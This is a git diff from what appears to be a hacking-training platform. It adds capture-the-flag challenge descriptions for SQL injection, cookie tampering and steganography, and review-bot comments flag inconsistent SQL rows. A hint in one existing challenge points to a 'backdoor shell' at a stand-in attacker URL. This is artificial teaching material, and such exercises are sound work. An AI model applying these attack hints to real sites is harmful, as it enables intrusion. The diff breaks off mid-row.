diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_cacheresource_file.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_cacheresource_file.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_append.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_append.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_assign.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_assign.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_block.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_block.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_break.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_break.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_call.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_call.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_capture.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_capture.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_config_load.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_config_load.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_continue.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_continue.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_debug.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_debug.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_eval.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_eval.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_extends.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_extends.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_for.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_for.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_foreach.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_foreach.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_function.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_function.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_if.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_if.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_include.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_include.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_include_php.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_include_php.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_insert.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_insert.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_ldelim.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_ldelim.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_nocache.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_nocache.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_block_plugin.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_block_plugin.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_function_plugin.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_function_plugin.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_modifier.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_modifier.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_object_block_function.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_object_block_function.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_object_function.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_object_function.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_print_expression.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_print_expression.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_registered_block.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_registered_block.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_registered_function.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_registered_function.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_special_variable.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_private_special_variable.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_rdelim.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_rdelim.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_section.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_section.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_setfilter.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_setfilter.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_while.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_while.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compilebase.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compilebase.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_config.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_config.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_config_file_compiler.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_config_file_compiler.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_configfilelexer.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_configfilelexer.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_configfileparser.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_configfileparser.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_data.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_data.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_debug.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_debug.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_filter_handler.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_filter_handler.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_function_call_handler.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_function_call_handler.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_get_include_path.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_get_include_path.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_nocache_insert.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_nocache_insert.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_parsetree.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_parsetree.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_eval.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_eval.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_extends.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_extends.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_file.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_file.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_php.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_php.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_registered.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_registered.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_stream.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_stream.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_string.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_string.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_smartytemplatecompiler.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_smartytemplatecompiler.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_template.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_template.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatebase.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatebase.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatecompilerbase.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatecompilerbase.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatelexer.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatelexer.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templateparser.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templateparser.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_utility.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_utility.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_write_file.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_write_file.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_custom.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_custom.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_recompiled.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_recompiled.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_uncompiled.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_uncompiled.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_security.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_security.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.8/libs/plugins/function.locale.php b/extlib/Smarty-3.1.8/libs/plugins/function.locale.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/AddChallenge.php b/hackademic_devtests/admin/controller/AddChallenge.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/AddUserTest.php.php b/hackademic_devtests/admin/controller/AddUserTest.php.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/ArticleManagerTest.php b/hackademic_devtests/admin/controller/ArticleManagerTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/ChallengeManager.php b/hackademic_devtests/admin/controller/ChallengeManager.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/ClassManagerTest.php b/hackademic_devtests/admin/controller/ClassManagerTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/Scoring.php b/hackademic_devtests/admin/controller/Scoring.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/UserClassesTest.php b/hackademic_devtests/admin/controller/UserClassesTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/model/class.MenuBackendTest.php b/hackademic_devtests/admin/model/class.MenuBackendTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/model/class.OptionsTest.php b/hackademic_devtests/admin/model/class.OptionsTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/model/class.PageBackendTest.php b/hackademic_devtests/admin/model/class.PageBackendTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/class.BaseTest.php b/hackademic_devtests/class.BaseTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/ReadArticle.php b/hackademic_devtests/controller/ReadArticle.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/Solve Challenge.php b/hackademic_devtests/controller/Solve Challenge.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/TryChallenge.php b/hackademic_devtests/controller/TryChallenge.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/View Scores.php b/hackademic_devtests/controller/View Scores.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/class.HackademicControllerTest.php b/hackademic_devtests/controller/class.HackademicControllerTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/implementations/class.HackademicControllerImplementation.php b/hackademic_devtests/controller/implementations/class.HackademicControllerImplementation.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/initTests.php b/hackademic_devtests/initTests.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.ArticleTest.php b/hackademic_devtests/model/common/class.ArticleTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.ChallengeAttemptsTest.php b/hackademic_devtests/model/common/class.ChallengeAttemptsTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.ChallengeTest.php b/hackademic_devtests/model/common/class.ChallengeTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.HackademicDBTest.php b/hackademic_devtests/model/common/class.HackademicDBTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.MenuTest.php b/hackademic_devtests/model/common/class.MenuTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.PageTest.php b/hackademic_devtests/model/common/class.PageTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.PluginTest.php b/hackademic_devtests/model/common/class.PluginTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/selenium-server-standalone-2.45.0.jar b/hackademic_devtests/selenium-server-standalone-2.45.0.jar
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/selenium/ui/log_in_click_options_enable_disable_plugin_and_theme.html b/hackademic_devtests/selenium/ui/log_in_click_options_enable_disable_plugin_and_theme.html
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/selenium/ui/test_plugin_suite.html b/hackademic_devtests/selenium/ui/test_plugin_suite.html
old mode 100644
new mode 100755
diff --git a/index.php b/index.php
old mode 100644
new mode 100755
diff --git a/installation/index.php b/installation/index.php
old mode 100644
new mode 100755
diff --git a/installation/installer/Installer.php b/installation/installer/Installer.php
old mode 100644
new mode 100755
diff --git a/installation/installer/data/index.php b/installation/installer/data/index.php
old mode 100644
new mode 100755
diff --git a/installation/installer/data/lang/index.php b/installation/installer/data/lang/index.php
old mode 100644
new mode 100755
diff --git a/installation/installer/index.php b/installation/installer/index.php
old mode 100644
new mode 100755
diff --git a/installation/sql/db.sql b/installation/sql/db.sql
old mode 100644
new mode 100755
index 06c24b62..922c2da9
--- a/installation/sql/db.sql
+++ b/installation/sql/db.sql
@@ -87,7 +87,7 @@ INSERT INTO `challenges` (`title`, `pkg_name`, `description`, `author`, `categor
('Challenge 23', 'ch023', '\n \n Ever been to take part in a treasure hint? Here''s your chance.The treasure is hidden somewhere in the web server.Try to use the hints available and reach the treasure. \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:42', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 24', 'ch024', '\n \n You have ordered a product on a website online.But,you found out that the product was defective and so, asked for a refund. But,the website rejected your refund request without any reason. You, being a hacker want to hack into the system and make your refund request accepted. \n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web,network', '2015-03-15 23:05:43', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 25', 'ch025', '\n \n Time to hurry! You have mistakenly sent an important mail to the wrong person. The details of the mail are too valuable and you can''t risk them being read by a wrong person.So, hurry up and stop the person from reading the mail.\n Your Email: user234@email.com\n Password: Usr@#$lc \n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:44', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
-('Challenge 26', 'ch026', '\n \n You are a member of the National Cyber Security group, along with a friend of yours.\n \n Your friend came across a conversation between 2 people and he suspected it to be related to some fraud. So, he started a Man-In-The-Middle Attack and succesfully installed a new key between them, during the key exchange phase. \n \n Now, he has asked you to spy on this conversation and gave you the details of the keys.He did not give you any information about the encryption scheme being used in the conversation. Its your turn to continue the MIM attack in such a way that none of the parties detect the attack. \n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:45', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+('Challenge 26', 'ch026', '\n \n You are a member of the National Cyber Security group, along with a friend of yours.\n \n Your friend came across a conversation between 2 people and he suspected it to be related to some fraud. So , he started a Man-In-The-Middle Attack and succesfully installed a new key between them, during the key exchange phase. \n \n Now, he has asked you to spy on this conversation and gave you the details of the keys.He did not give you any information about the encryption scheme being used in the conversation. Its your turn to continue the MIM attack in such a way that none of the parties detect the attack. \n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:45', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 27', 'ch027', '\n \n The archaeological department has found a book which is hundreds of years old. This book named ''The Treasure'' tells of a treasure of immense value.The book also contains an encrypted text, which might help in finding the key to the treasure. You have been entrusted the responsibility to decipher it.\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'crypto', '2015-03-15 23:05:46', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 28', 'ch028', '\n \nYou are again given the task to perform a Man-In-Middle Attack by your Security Agency.This time, both the parties are using the secure Diffie-Hellman Key Exchange protocol for generating keys.You have to perform the MIM attack during this key exchange.You can read about this key exchange protocol\nhere\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:39', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 29', 'ch029', '\n \nThis is a challenge to test your knowledge of Cross Site Request Forgery attacks. Use CSRF attack and get your bank account credited with an amount of 1200 or greater.\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:39', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
@@ -101,7 +101,12 @@ INSERT INTO `challenges` (`title`, `pkg_name`, `description`, `author`, `categor
('Challenge 37', 'ch037', '\n \nYou have been using an online calendar service for a long time.Recently, a bug has crept into that service and so,its displaying the wrong date and time.You have saved a lot of events and plans in that website and they all got mapped to some different date and time.The website doesn''t even have a contact-us info to report the bug.See if you can creep into the server and change the settings.\n\n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 38', 'ch038', '\n \nYou have come across a series of encrypted messages exchanged between 2 servers.You suspect these messages to be related to an online fraud. So,to verify these messages,you need the key file. The needed file is key.txt and is located in the web root directory,but you have no permission to access it. Can you access this file and decrypt the message?\n\n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 39', 'ch039', '\n \n XOR cipher is one of the most secure ciphers and provides unconditional security. YOu are now given a task to break this cipher.Find the message corresponding to a xor encrypted cipher text.\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'crypto', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
-('Challenge 40', 'ch040', '\n \n Your friend wants to take help from a third party service provider to improve his own website''s security and search engine visibility.He asked you to view that website and certify it to be completely secure.If you find some loophole in the website''s security, use it to log in as the admin.\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:41', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL);
+('Challenge 40', 'ch040', '\n \n Your friend wants to take help from a third party service provider to improve his own website''s security and search engine visibility.He asked you to view that website and certify it to be completely secure.If you find some loophole in the website''s security, use it to log in as the admin.\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:41', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+('Challenge 41', 'ch041', '\n \n A Friend of your''s is a great football freak, he has newly created a website [ FootbalLovers ] and has challenged you to get the admin privileges to the website by setting up a ctf type challenge. All you have to do is find out the login credentials of the website and login as admin.\n \n \nHints and tips : First thing you will notice is, that this admin page has right click disabled on it (or rather both the clicks). This is a little annoying thing, but some web developers use it to hide their source code and maybe some private images. You would have to bypass this and get your way around to the credentials, maybe hidden or encrypted. There are some more hints as you proceed through the challenge. Here''s one : "Images can reveal way too much". All the Best, don''t lose patience !!\n \n \n \n', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'stegano', '2016-03-8 06:51:22', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+('Challenge 42', 'ch042', '\n \n Government officials have discovered a paid website, which might have illegal activities covering under them, and they have hired you to get the admin login details of this SITE. However, they have solved this to an extent and have MITM''d a regular user to get the following credentials { username : scrtusr & password : mint_cinnamon} however this bit of information isn''t enough to get to the user''s profile or to inject into the website to get admin login details . So, now you have to find out the admin credentials and hand it over to the government officials, so that they can carry out some security checks. Login as admin.\n \n \nHints and Tips : You have the credentials of a user, but his profile is not accessible due to some restrictions the website has setup''d. "You cannot have access to your profile without OurBrowser, *If you are our customer, you would have our paid browser and you would know how to continue". This does lead to something. Check out the http requests, and more importantly You''re LOGGED in (atleast as a user). Here''s another : Wanna have a Cookie ??\n \n \nreference1\n \n \n \nSetup database HERE \n \n \n', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n Rajat Moury\n', 'cool', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+('Challenge 43', 'ch043', '\n \n A Web Developer has made his best out to secure his website from various injection attacks by using various filters and even thinks that even the best hacker couldn''t break into his site. Prove him wrong. Link : SITE. However, you have been just using the system which has a user already logged in. So, first you have to inject the website to get the admin credentials and then search for the admin login page [You wouldn''t even find the admin page by using a search engine as search bots have been excluded]. Common give it a try, All the Best !!
\n \nHints and Tips :
+Notice the http requests passing between your browser and localhost server. This is the most common type of vulnerability online these days. There has always been a way to bypass filters. \n \n \nreference1reference2 \n \n
Setup database HERE
+\n \n \n \n', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n Rajat Moury\n', 'sqli', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL);
--
-- Table structure for table challenge_attempts
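Review bot: The category `'cool'` on the added Challenge 42 row reads like a placeholder, since the neighbouring rows use topic names such as `'web'`, `'crypto'` or `'web,network'`. Anything that groups or filters challenges by category would get a bucket that says nothing about the exercise; `'web'` looks like the intended value, though that is inferred from the description. The Challenge 42 and 43 rows also reuse `'2015-03-15 23:05:40'` as the creation date, while Challenge 41 uses `'2016-03-8 06:51:22'` with an unpadded day; `'2016-03-08 06:51:22'` and real dates for the other two would keep the column consistent. The temp.sql hunk carries the same three values, and the INSERT statement itself begins above this hunk.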
@@ -182,7 +187,10 @@ INSERT INTO class_challenges (challenge_id , class_id , date_created ) VALUE
(7, 1, '2012-08-09 01:01:07'),
(8, 1, '2012-08-09 01:01:07'),
(9, 1, '2012-10-16 22:32:58'),
-(10, 1, '2012-08-09 01:01:07');
+(10, 1, '2012-08-10 01:01:07'),
+(43, 1, '2016-03-10 03:40:01'),
+(44, 1, '2016-03-10 03:40:01'),
+(45, 1, '2016-03-10 03:40:01');
-- --------------------------------------------------------
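Review bot: The three added `class_challenges` rows hard-code `challenge_id` 43, 44 and 45, but the `challenges` INSERT in this file lists no `id` column, so the numbers only line up if the new challenges happen to be assigned exactly those ids. Adding, removing or reordering an earlier challenge row would then attach class 1 to the wrong challenges or to none; whether a foreign key would catch that is not visible here. Resolving the id by package name removes the coupling, e.g. `((SELECT id FROM challenges WHERE pkg_name = 'ch041'), 1, '2016-03-10 03:40:01'),`. The hunk also changes the date on the existing `(10, 1, …)` row from `2012-08-09` to `2012-08-10`, which looks unintended. The INSERT statement begins above the hunk.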
diff --git a/installation/sql/temp.sql b/installation/sql/temp.sql
old mode 100644
new mode 100755
index d3090e98..c10fb058
--- a/installation/sql/temp.sql
+++ b/installation/sql/temp.sql
@@ -89,7 +89,12 @@ INSERT INTO `challenges` (`id`, `title`, `pkg_name`, `description`, `author`, `c
(9, 'Challenge 9', 'ch009', 'A friend of yours has set up a news blog at slagoff.com. However, he is kind of worried \r\n\r\nregarding the security of the news that gets posted on the blog and has asked you to check \r\n\r\nhow secure it is.
Your objective is to determine whether any vulnerabilities \r\n\r\nexist that, if exploited, can grant access to the blog''s server.
Hint: A \r\n\r\nspecially-tailored backdoor shell can be found at "http://www.really_nasty_hacker.com/shell.txt".', 'Andreas Venieris,\n \r\n\r\nKonstantinos Papapanagiotou,\n Anastasios Stasinopoulos,\n Vasilios Vlachos,\r\n\r\n\n Alexandros Papanikolaou', 'web', '2012-08-09 00:31:31', 'public', 1, NULL, '1', 60, NULL, NULL, 'public', 1, 60),
(10, 'Challenge 10', 'ch010', 'Would you like to become an active hacker ? How about \r\n\r\nbecoming a member of the world''s largest hacker group: The n1nJ4.n4x0rZ.CreW! \r\n\r\n Before you can join though, you ''ll have to prove yourself worthy by passing the \r\n\r\ntest that can be found at: http://n1nj4h4x0rzcr3w.com
If you succeed in completing the challenge, \r\n\r\nyou will get a serial number, which you will use for obtaining the password that will \r\n\r\nenable you to join the group.
Your objective is to bypass the authentication \r\n\r\nmechanism, find the serial number and be supplied with your own username and password from \r\n\r\n the admin team of the site.', 'Andreas Venieris,\n Konstantinos Papapanagiotou,\n \r\n\r\n Anastasios Stasinopoulos,\n Vasilios Vlachos,\n Alexandros \r\n\r\nPapanikolaou', 'web', '2012-08-09 00:32:07', 'public', 1, NULL, '1', 60, NULL, NULL, 'public', 1, 60),
(11, 'Example Template For Challenge xml Files creation', 'example', '
Insert some text describing the scenario of the challenge(what the users are supposed to do and if there is any fictional story)
', 'Name or email or both', 'In what category does your challenge belong?(web? crypto? networks?)', '2012-10-16 22:35:01', 'private', 0, NULL, '1', 60, NULL, NULL, 'private', 1, 0),
-(12, 'cookiEng', 'cookiEng', '
Hello, we have heard that you are one of the best hackers in our country. We need your services. You must visit an underground site and find the right password. With this password we will cancel 100k+ illegal gun and drug deals!\n The good news are that we have the directory where the password is stored. Its here \\"/t0psec\\".\n The bad news are that we have no access there. Only the administrator does. Go and find the password for us!
